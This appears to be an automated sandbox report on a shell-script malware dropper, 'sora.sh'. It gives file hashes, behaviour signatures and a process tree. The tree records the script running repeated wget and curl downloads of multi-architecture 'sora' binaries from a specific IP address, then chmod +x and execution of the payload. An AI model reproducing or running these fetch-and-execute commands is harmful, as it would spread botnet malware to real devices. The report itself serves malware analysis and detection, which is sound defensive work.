Analysis
-
max time kernel
29s -
max time network
31s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
01-07-2024 10:40
Static task
static1
Behavioral task
behavioral1
Sample
103.162.20.166-sora.sh-2024-06-28T114030.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
103.162.20.166-sora.sh-2024-06-28T114030.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
103.162.20.166-sora.sh-2024-06-28T114030.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
103.162.20.166-sora.sh-2024-06-28T114030.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
103.162.20.166-sora.sh-2024-06-28T114030.sh
-
Size
1KB
-
MD5
03886bf0d399576fcb6db8c11fcbe06d
-
SHA1
14aee1089d0cf3283da30aa045a454109d1a1c9f
-
SHA256
19e122301b598e2a4a36b685887b7a2c238debfd310fd66b7d719d6454ec6ed2
-
SHA512
8e809a3f916b198d808b61dc2da812c57d36f960a0800b61b2a3ae047c74220dbaa6b0e1c19f421101c831de54b7218204e3447b162c739917ca34d297be178c
Malware Config
Signatures
-
Executes dropped EXE 10 IoCs
Processes:
robbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenioc pid process /tmp/robben 736 robben /tmp/robben 741 robben /tmp/robben 773 robben /tmp/robben 796 robben /tmp/robben 801 robben /tmp/robben 836 robben /tmp/robben 841 robben /tmp/robben 846 robben /tmp/robben 851 robben /tmp/robben 859 robben -
Reads runtime system information 10 IoCs
Reads data from /proc virtual filesystem.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 11 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlcurlcurlcurlcurlcurl103.162.20.166-sora.sh-2024-06-28T114030.shcurlcurldescription ioc process File opened for modification /tmp/sora.arm6 curl File opened for modification /tmp/sora.arm7 curl File opened for modification /tmp/sora.m68k curl File opened for modification /tmp/sora.x86 curl File opened for modification /tmp/sora.mips curl File opened for modification /tmp/sora.mpsl curl File opened for modification /tmp/sora.ppc curl File opened for modification /tmp/sora.sh4 curl File opened for modification /tmp/robben 103.162.20.166-sora.sh-2024-06-28T114030.sh File opened for modification /tmp/sora.arm4 curl File opened for modification /tmp/sora.arm5 curl
Processes
-
/tmp/103.162.20.166-sora.sh-2024-06-28T114030.sh/tmp/103.162.20.166-sora.sh-2024-06-28T114030.sh1⤵
- Writes file to tmp directory
-
/usr/bin/wgetwget http://103.162.20.166/bins/sora.x862⤵
-
/usr/bin/curlcurl -O http://103.162.20.166/bins/sora.x862⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/catcat sora.x862⤵
-
/bin/chmodchmod +x 103.162.20.166-sora.sh-2024-06-28T114030.sh robben sora.x86 systemd-private-0d8026cf2935495f8f927fce445134b8-systemd-timedated.service-bP3Dt22⤵
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
-
/usr/bin/wgetwget http://103.162.20.166/bins/sora.mips2⤵
-
/usr/bin/curlcurl -O http://103.162.20.166/bins/sora.mips2⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/catcat sora.mips2⤵
-
/bin/chmodchmod +x 103.162.20.166-sora.sh-2024-06-28T114030.sh robben sora.mips sora.x86 systemd-private-0d8026cf2935495f8f927fce445134b8-systemd-timedated.service-bP3Dt22⤵
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
-
/usr/bin/wgetwget http://103.162.20.166/bins/sora.mpsl2⤵
-
/usr/bin/curlcurl -O http://103.162.20.166/bins/sora.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/catcat sora.mpsl2⤵
-
/bin/chmodchmod +x 103.162.20.166-sora.sh-2024-06-28T114030.sh robben sora.mips sora.mpsl sora.x86 systemd-private-0d8026cf2935495f8f927fce445134b8-systemd-timedated.service-bP3Dt22⤵
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
-
/usr/bin/wgetwget http://103.162.20.166/bins/sora.arm42⤵
-
/usr/bin/curlcurl -O http://103.162.20.166/bins/sora.arm42⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/catcat sora.arm42⤵
-
/bin/chmodchmod +x 103.162.20.166-sora.sh-2024-06-28T114030.sh robben sora.arm4 sora.mips sora.mpsl sora.x86 systemd-private-0d8026cf2935495f8f927fce445134b8-systemd-timedated.service-bP3Dt22⤵
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
-
/usr/bin/wgetwget http://103.162.20.166/bins/sora.arm52⤵
-
/usr/bin/curlcurl -O http://103.162.20.166/bins/sora.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/catcat sora.arm52⤵
-
/bin/chmodchmod +x 103.162.20.166-sora.sh-2024-06-28T114030.sh robben sora.arm4 sora.arm5 sora.mips sora.mpsl sora.x86 systemd-private-0d8026cf2935495f8f927fce445134b8-systemd-timedated.service-bP3Dt22⤵
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
-
/usr/bin/wgetwget http://103.162.20.166/bins/sora.arm62⤵
-
/usr/bin/curlcurl -O http://103.162.20.166/bins/sora.arm62⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/catcat sora.arm62⤵
-
/bin/chmodchmod +x 103.162.20.166-sora.sh-2024-06-28T114030.sh robben sora.arm4 sora.arm5 sora.arm6 sora.mips sora.mpsl sora.x86 systemd-private-0d8026cf2935495f8f927fce445134b8-systemd-timedated.service-bP3Dt22⤵
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
-
/usr/bin/wgetwget http://103.162.20.166/bins/sora.arm72⤵
-
/usr/bin/curlcurl -O http://103.162.20.166/bins/sora.arm72⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/catcat sora.arm72⤵
-
/bin/chmodchmod +x 103.162.20.166-sora.sh-2024-06-28T114030.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.mips sora.mpsl sora.x86 systemd-private-0d8026cf2935495f8f927fce445134b8-systemd-timedated.service-bP3Dt22⤵
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
-
/usr/bin/wgetwget http://103.162.20.166/bins/sora.ppc2⤵
-
/usr/bin/curlcurl -O http://103.162.20.166/bins/sora.ppc2⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/catcat sora.ppc2⤵
-
/bin/chmodchmod +x 103.162.20.166-sora.sh-2024-06-28T114030.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.mips sora.mpsl sora.ppc sora.x86 systemd-private-0d8026cf2935495f8f927fce445134b8-systemd-timedated.service-bP3Dt22⤵
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
-
/usr/bin/wgetwget http://103.162.20.166/bins/sora.m68k2⤵
-
/usr/bin/curlcurl -O http://103.162.20.166/bins/sora.m68k2⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/catcat sora.m68k2⤵
-
/bin/chmodchmod +x 103.162.20.166-sora.sh-2024-06-28T114030.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.m68k sora.mips sora.mpsl sora.ppc sora.x86 systemd-private-0d8026cf2935495f8f927fce445134b8-systemd-timedated.service-bP3Dt22⤵
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
-
/usr/bin/wgetwget http://103.162.20.166/bins/sora.sh42⤵
-
/usr/bin/curlcurl -O http://103.162.20.166/bins/sora.sh42⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/catcat sora.sh42⤵
-
/bin/chmodchmod +x 103.162.20.166-sora.sh-2024-06-28T114030.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.m68k sora.mips sora.mpsl sora.ppc sora.sh4 sora.x86 systemd-private-0d8026cf2935495f8f927fce445134b8-systemd-timedated.service-bP3Dt22⤵
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
/tmp/robbenFilesize
212B
MD55d25722cdfdb2e5f4ae4533a926cedbe
SHA138551d63ca7fbddb3edbdf6eae22a68356815a0d
SHA2564c715b09d04887f708de1f67469f0889ec0c95a748cd7bc56acfaa6b61d87210
SHA512f400a8f2307ce476e697aef0d0190f6fc718c551b8371a439919144288010798a12bed94c7bcaf09257c312779bc449f67f67bffb2f59437f72127ed3ce7fcf2
-
/tmp/robbenFilesize
212B
MD59ba9b146a72f73439174053694eeac60
SHA1afda1e855e493c7da6dcdc69cd5fc0e0ca258ceb
SHA2561fc8d778a2b5af0ae5b6c16ec9868f314b5c2f6b61c309ab3723a9f61d557c1d
SHA5123f1e75f36e90ed1212556733dcaab4a982621038679aea10f8601e27ff140ae4a8229c045b42cc395eca586805279039bef83a9e4c92a3067a7f74d1ddb80d17
-
/tmp/robbenFilesize
212B
MD545e588171939a0780c48755918b1cd74
SHA16c33e64b1a43fb6752026fd1254cac740e7c3243
SHA256770e501d0a52805862fd689d9832d9001926093503ddeb42bf28826c3509c535
SHA512fe414d5969a9cc3fb54e26ea145ac31f8114988821c5c30a18b5f3f2a74b5c9146764bd17746d49c1d823a885043ef1d2b4b359503fc5f8dbe818cb978789770
-
/tmp/robbenFilesize
212B
MD5f734b1844820ab008c1a5f6792aa4a3e
SHA13a2cdbbe16b44882220cd0f95623a93edbd1cf04
SHA256c456f2c2416ab494d8a1895f280d1eaa7ddbd5b398c45dd16e4964d4a64890f7
SHA512e0e8beafec237a68be332654e9b21c01594b54137aa73721c50e2a7a19c4837bbe9acad744315f6c17744538c37edd7277139e7ae9cf710912dafadc88bbda4e
-
/tmp/robbenFilesize
212B
MD5e1ef1cce20af75dc2ab76c9a2966405b
SHA1cce6f8372b89b58bdcb3318715792cb3f74f8574
SHA256261d3eb28f0af43392f33228fcf2af3219fb192969d2e6f7e760aa1b1ed17c21
SHA5123eb6a053043e8ca4882075da8c2a2cb59aad374ec9f0e85f7d4a4d96345ec334ba5fbb66149dfb25d6657fa77b7f9458fea0b4278a3f24b3d06f3d9b9372d884
-
/tmp/sora.x86Filesize
211B
MD584f10f166d89a58dd5da78b6aa2383b3
SHA17ea0dd34f3426120459f7720018881f6bb58d7b7
SHA256a3c413b60509b57aaffa4012b5dabc23a2114bac559aad32dcab706ec6825446
SHA51225f58b852b1f6caf8d7ebb85cedadfe3dc963d2fdddb7c61ab6bc2b228d712bfb166a69c9187ede5225b9fd65881b2a3573e49a2d3a112df769ec4d3d5d7ffe9